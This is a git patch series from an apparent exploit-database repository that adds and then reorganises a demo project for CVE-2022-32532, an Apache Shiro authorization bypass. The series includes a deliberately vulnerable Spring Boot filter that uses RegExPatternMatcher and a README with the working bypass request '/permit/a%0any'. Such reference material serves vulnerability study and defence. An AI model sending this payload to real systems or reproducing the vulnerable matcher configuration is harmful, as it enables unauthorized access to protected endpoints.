From 83fa4a93100e423da4d1fa8d80aac37e081ec572 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:26:01 +0800
Subject: [PATCH 01/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ++
.../inspectionProfiles/profiles_settings.xml | 6 +++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 ++++
.idea/openkylin-exploit-db.iml | 12 ++++++
.idea/vcs.xml | 6 +++
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
.../2022/yaml/CVE-2022-32532.yaml | 23 +++++++++++
16 files changed, 299 insertions(+)
create mode 100644 .idea/.gitignore
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
create mode 100644 cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 00000000..26d33521
--- /dev/null
+++ b/.idea/.gitignore
@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..94a25f7f
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
new file mode 100644
index 00000000..12fb0f1a
--- /dev/null
+++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-32532
+source: https://github.com/Lay0us1/CVE-2022-32532
+info:
+ name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
+ severity: CRITICAL
+ description: |
+ 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
+ scope-of-influence:
+ Apache Shiro 1.9.1之前
+ reference:
+ - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32532
+ - https://www.cybersecurity-help.cz/vdb/SB2022062909
+ - https://cxsecurity.com/cveshow/CVE-2022-32532/
+ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-32532
+ cwe-id: CWE-863
+ cnvd-id: CNNVD-202206-2750
+ kve-id: None
+ tags: 旁路授权
\ No newline at end of file
--
Gitee
From 57c4433f54e4d16ccab8fb86b62e7118ce716aab Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:26:37 +0800
Subject: [PATCH 02/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ---
.idea/inspectionProfiles/profiles_settings.xml | 6 ------
.idea/misc.xml | 4 ----
.idea/modules.xml | 8 --------
.idea/openkylin-exploit-db.iml | 12 ------------
.idea/vcs.xml | 6 ------
6 files changed, 39 deletions(-)
delete mode 100644 .idea/.gitignore
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
diff --git a/.idea/.gitignore b/.idea/.gitignore
deleted file mode 100644
index 26d33521..00000000
--- a/.idea/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 94a25f7f..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
--
Gitee
From e3dd12526e32f36a274a3bc0e1d3e4440e9f15cf Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:40:28 +0800
Subject: [PATCH 03/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.gitmodules | 3 +++
CVE-2022-32532 | 1 +
2 files changed, 4 insertions(+)
create mode 160000 CVE-2022-32532
diff --git a/.gitmodules b/.gitmodules
index 389186c0..869d5aae 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,3 +5,6 @@
[submodule "cve/django/2022/CVE-2022-28346/POC_env"]
path = cve/django/2022/CVE-2022-28346/POC_env
url = https://github.com/DeEpinGh0st/CVE-2022-28346
+[submodule "CVE-2022-32532"]
+ path = CVE-2022-32532
+ url = https://github.com/Lay0us1/CVE-2022-32532
diff --git a/CVE-2022-32532 b/CVE-2022-32532
new file mode 160000
index 00000000..58c03400
--- /dev/null
+++ b/CVE-2022-32532
@@ -0,0 +1 @@
+Subproject commit 58c03400ee5ad0fa4bd8b5d1908c750b6c42a34b
--
Gitee
From 82ef654006e9cd50b2da40328705dd6345a2b9e1 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:53:55 +0800
Subject: [PATCH 04/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.gitmodules | 4 +-
.../apache-Shiro/2022/CVE-2022-32532 | 0
.../2022/CVE-2022-32532/.gitignore | 33 ---------------
.../2022/CVE-2022-32532/README.md | 35 ----------------
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ------------------
.../com/example/shirodemo/DemoController.java | 21 ----------
.../java/com/example/shirodemo/MyFilter.java | 35 ----------------
.../shirodemo/MyShiroFilterFactoryBean.java | 40 -------------------
.../com/example/shirodemo/ShiroConfig.java | 22 ----------
.../shirodemo/ShiroDemoApplication.java | 13 ------
.../src/main/resources/application.properties | 0
11 files changed, 2 insertions(+), 239 deletions(-)
rename CVE-2022-32532 => cve/apache-Shiro/2022/CVE-2022-32532 (100%)
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
delete mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
diff --git a/.gitmodules b/.gitmodules
index 869d5aae..6ee874ba 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -5,6 +5,6 @@
[submodule "cve/django/2022/CVE-2022-28346/POC_env"]
path = cve/django/2022/CVE-2022-28346/POC_env
url = https://github.com/DeEpinGh0st/CVE-2022-28346
-[submodule "CVE-2022-32532"]
- path = CVE-2022-32532
+[submodule "cve/apache-Shiro/2022/CVE-2022-32532"]
+ path = cve/apache-Shiro/2022/CVE-2022-32532
url = https://github.com/Lay0us1/CVE-2022-32532
diff --git a/CVE-2022-32532 b/cve/apache-Shiro/2022/CVE-2022-32532
similarity index 100%
rename from CVE-2022-32532
rename to cve/apache-Shiro/2022/CVE-2022-32532
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
deleted file mode 100644
index 549e00a2..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
+++ /dev/null
@@ -1,33 +0,0 @@
-HELP.md
-target/
-!.mvn/wrapper/maven-wrapper.jar
-!**/src/main/**/target/
-!**/src/test/**/target/
-
-### STS ###
-.apt_generated
-.classpath
-.factorypath
-.project
-.settings
-.springBeans
-.sts4-cache
-
-### IntelliJ IDEA ###
-.idea
-*.iws
-*.iml
-*.ipr
-
-### NetBeans ###
-/nbproject/private/
-/nbbuild/
-/dist/
-/nbdist/
-/.nb-gradle/
-build/
-!**/src/main/**/build/
-!**/src/test/**/build/
-
-### VS Code ###
-.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
deleted file mode 100644
index 975b0366..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/README.md
+++ /dev/null
@@ -1,35 +0,0 @@
-# CVE-2022-32532
-
-## about
-
-This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
-
-In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
-
-## introduce
-
-Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
-
-This request can succeed
-```http request
-GET /permit/any HTTP/1.1
-Token: 4ra1n
-```
-
-Access is not allowed when there is no token request header
-```http request
-GET /permit/any HTTP/1.1
-```
-
-It can be bypassed in a simple way in special but common configurations
-```http request
-GET /permit/a%0any HTTP/1.1
-```
-
-## reference
-
-https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
-
-This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
-
-Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
deleted file mode 100644
index 5210b547..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
+++ /dev/null
@@ -1,38 +0,0 @@
-
-
- 4.0.0
-
- org.springframework.boot
- spring-boot-starter-parent
- 2.7.0
-
-
- com.example
- shiro-demo
- 0.0.1-SNAPSHOT
- shiro-demo
- CVE-2022-32532
-
- 1.8
-
-
-
- org.springframework.boot
- spring-boot-starter-web
-
-
- org.apache.shiro
- shiro-spring
- 1.9.0
-
-
-
-
-
- org.springframework.boot
- spring-boot-maven-plugin
-
-
-
-
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
deleted file mode 100644
index fd71b1a0..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
+++ /dev/null
@@ -1,21 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.web.bind.annotation.PathVariable;
-import org.springframework.web.bind.annotation.RequestMapping;
-import org.springframework.web.bind.annotation.RestController;
-
-@RestController
-public class DemoController {
- @RequestMapping(path = "/permit/{value}")
- public String permit(@PathVariable String value) {
- System.out.println("success!");
- return "success";
- }
-
- // Another Bypass
- // @RequestMapping(path = "/permit/*")
- public String permit() {
- System.out.println("success!");
- return "success";
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
deleted file mode 100644
index beaf98ae..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
+++ /dev/null
@@ -1,35 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.AccessControlFilter;
-
-import javax.servlet.ServletRequest;
-import javax.servlet.ServletResponse;
-import javax.servlet.http.HttpServletRequest;
-import java.io.IOException;
-
-public class MyFilter extends AccessControlFilter {
-
- public MyFilter(){
- super();
- this.pathMatcher = new RegExPatternMatcher();
- }
-
- @Override
- protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
- String token = ((HttpServletRequest)request).getHeader("Token");
- // todo: check permission ...
- return token != null && token.equals("4ra1n");
- }
-
- @Override
- protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
- System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
- try {
- response.getWriter().println("access denied");
- } catch (IOException e) {
- e.printStackTrace();
- }
- return false;
- }
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
deleted file mode 100644
index d24431e4..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
+++ /dev/null
@@ -1,40 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.util.RegExPatternMatcher;
-import org.apache.shiro.web.filter.mgt.*;
-import org.apache.shiro.web.mgt.WebSecurityManager;
-import org.apache.shiro.web.servlet.AbstractShiroFilter;
-
-
-public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
-
- public MyShiroFilterFactoryBean() {
- super();
- }
-
- @Override
- protected AbstractShiroFilter createInstance() {
- SecurityManager securityManager = this.getSecurityManager();
- FilterChainManager manager = new DefaultFilterChainManager();
- manager.addFilter("myFilter",new MyFilter());
- // my filter
- manager.addToChain("/permit/.*", "myFilter");
- // todo: add other filters
-
- PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
- chainResolver.setFilterChainManager(manager);
- // set RegExPatternMatcher
- chainResolver.setPathMatcher(new RegExPatternMatcher());
- return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
- }
-
- static class SpringShiroFilter extends AbstractShiroFilter {
- protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
- this.setSecurityManager(webSecurityManager);
- this.setFilterChainResolver(resolver);
- }
- }
-}
-
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
deleted file mode 100644
index 30a0f1b5..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
+++ /dev/null
@@ -1,22 +0,0 @@
-package com.example.shirodemo;
-
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-
-@Configuration
-public class ShiroConfig {
-
- @Bean
- public SecurityManager securityManager() {
- return new DefaultWebSecurityManager();
- }
-
- @Bean
- public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
- MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
- shiroFilterFactoryBean.setSecurityManager(securityManager);
- return shiroFilterFactoryBean;
- }
-}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
deleted file mode 100644
index 5d4615bd..00000000
--- a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
+++ /dev/null
@@ -1,13 +0,0 @@
-package com.example.shirodemo;
-
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-
-@SpringBootApplication
-public class ShiroDemoApplication {
-
- public static void main(String[] args) {
- SpringApplication.run(ShiroDemoApplication.class, args);
- }
-
-}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
deleted file mode 100644
index e69de29b..00000000
--
Gitee
From fb13fb7a97443080d615d7545ff19cdd0e751291 Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Thu, 13 Apr 2023 11:59:34 +0800
Subject: [PATCH 05/12] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/workspace.xml | 60 +++++++++++++++++++++++++++++++++++++++++++++
openkylin_list.yaml | 4 ++-
2 files changed, 63 insertions(+), 1 deletion(-)
create mode 100644 .idea/workspace.xml
diff --git a/.idea/workspace.xml b/.idea/workspace.xml
new file mode 100644
index 00000000..1723fab4
--- /dev/null
+++ b/.idea/workspace.xml
@@ -0,0 +1,60 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
